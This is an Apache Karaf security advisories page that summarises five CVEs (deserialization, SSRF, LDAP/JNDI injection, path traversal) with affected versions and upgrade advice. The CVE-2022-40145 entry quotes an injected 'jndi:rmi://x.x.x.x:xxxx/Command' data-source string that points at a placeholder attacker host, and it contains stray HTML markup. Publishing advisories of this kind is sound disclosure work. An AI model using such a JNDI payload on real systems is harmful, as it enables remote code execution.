Apache Karaf security advisories

Security information for Apache Karaf

Reporting

Do you want disclose a potential security issue for Apache Karaf? Send your report to the Apache Security Team.

Advisories

This section is experimental: it provides advisories since 2023 and may lag behind the official CVE publications. If you have any feedback on how you would like this data to be provided, you are welcome to reach out on our public mailinglist or privately on security@apache.org

Decanter log-socket collector has deserialization vulnerability

CVE-2026-24656 [CVE] [CVE json]

Last updated: 2026-01-26T09:41:22.803Z

Affected

  • Apache Karaf before 2.12.0
  • Apache Karaf at 2.12.0 unaffected

Description

Deserialization of Untrusted Data vulnerability in Apache Karaf Decanter.


The Decanter log socket collector exposes the port 4560, without authentication. If the collector exposes allowed classes property, this configuration can be bypassed.
It means that the log socket collector is vulnerable to deserialization of untrusted data, eventually causing DoS.


NB: Decanter log socket collector is not installed by default. Users who have not installed Decanter log socket are not impacted by this issue.

This issue affects Apache Karaf Decanter before 2.12.0.

Users are recommended to upgrade to version 2.12.0, which fixes the issue.

References

Credits

  • r00t4dm (finder)

Cave SSRF and arbitrary file access

CVE-2024-34365 [CVE] [CVE json] [OSV json]

Last updated: 2024-05-09T06:49:03.305Z

Affected

  • Apache Karaf Cave through *

Description

** UNSUPPORTED WHEN ASSIGNED ** Improper Input Validation vulnerability in Apache Karaf Cave.

This issue affects all versions of Apache Karaf Cave.

As this project is retired, we do not plan to release a version that fixes this issue. Users are recommended to find an alternative or restrict access to the instance to trusted users.

NOTE: This vulnerability only affects products that are no longer supported by the maintainer.

References

Credits

  • cigar (finder)

JDBC JAAS LDAP injection

CVE-2022-40145 [CVE] [CVE json] [OSV json]

Last updated: 2022-12-21T15:53:26.357Z

Affected

  • Apache Karaf from 4.4.0 before 4.4.2
  • Apache Karaf before 4.3.8

Description

This vulnerable is about a potential code injection when an attacker has control of the target LDAP server using in the JDBC JNDI URL.

The function jaas.modules.src.main.java.por
g.apache.karaf.jass.modules.jdbc.JDBCUtils#doCreateDatasource
use InitialContext.lookup(jndiName) without filtering.
An user can modify 
options.put(JDBCUtils.DATASOU</span><span style="background-color: rgb(255, 255, 255);">RCE, "osgi:" +&nbsp;</span><span style="background-color: rgb(255, 255, 255);">DataSource.class.getName()); to options.put(JDBCUtils.DATASOU</span><span style="background-color: rgb(255, 255, 255);">RCE,</span><span style="background-color: rgb(255, 255, 255);">"jndi:rmi://x.x.x.x:xxxx/Comma</span><span style="background-color: rgb(255, 255, 255);">nd"); in JdbcLoginModuleTest#setup.

This is vulnerable to a remote code execution (RCE) attack when a
configuration uses a JNDI LDAP data source URI when an attacker has
control of the target LDAP server.

This issue affects all versions of Apache Karaf up to 4.4.1 and 4.3.7.

We encourage the users to upgrade to Apache Karaf at least 4.4.2 or 4.3.8

References

Credits

Path traversal flaws

CVE-2022-22932 [CVE] [CVE json] [OSV json]

Last updated: 2022-01-25T14:53:17.546Z

Affected

  • Apache Karaf from Apache Karaf before 4.2.15

Description

Apache Karaf obr:* commands and run goal on the karaf-maven-plugin have partial path traversal which allows to break out of expected folder.

The risk is low as obr:* commands are not very used and the entry is set by user.

This has been fixed in revision:

https://gitbox.apache.org/repos/asf?p=karaf.git;h=36a2bc4 https://gitbox.apache.org/repos/asf?p=karaf.git;h=52b70cf

Mitigation: Apache Karaf users should upgrade to 4.2.15 or 4.3.6 or later as soon as possible, or use correct path.

JIRA Tickets: https://issues.apache.org/jira/browse/KARAF-7326

References

Credits

  • This issue was discovered and reported by GHSL team member Jaroslav Lobacevski

Insecure Java Deserialization in Apache Karaf

CVE-2021-41766 [CVE] [CVE json] [OSV json]

Last updated: 2022-01-25T14:39:43.793Z

Affected

  • Apache Karaf from Apache Karaf before 4.3.6

Description

Apache Karaf allows monitoring of applications and the Java runtime by using the Java Management Extensions (JMX). JMX is a Java RMI based technology that relies on Java serialized objects for client server communication. Whereas the default JMX implementation is hardened against unauthenticated deserialization attacks, the implementation used by Apache Karaf is not protected against this kind of attack.

The impact of Java deserialization vulnerabilities strongly depends on the classes that are available within the targets class path. Generally speaking, deserialization of untrusted data does always represent a high security risk and should be prevented.

The risk is low as, by default, Karaf uses a limited set of classes in the JMX server class path. It depends of system scoped classes (e.g. jar in the lib folder).

References

Credits

  • This issue was reported by Daniel Heyne, Konstantin Samuel and Tobias Neitzel.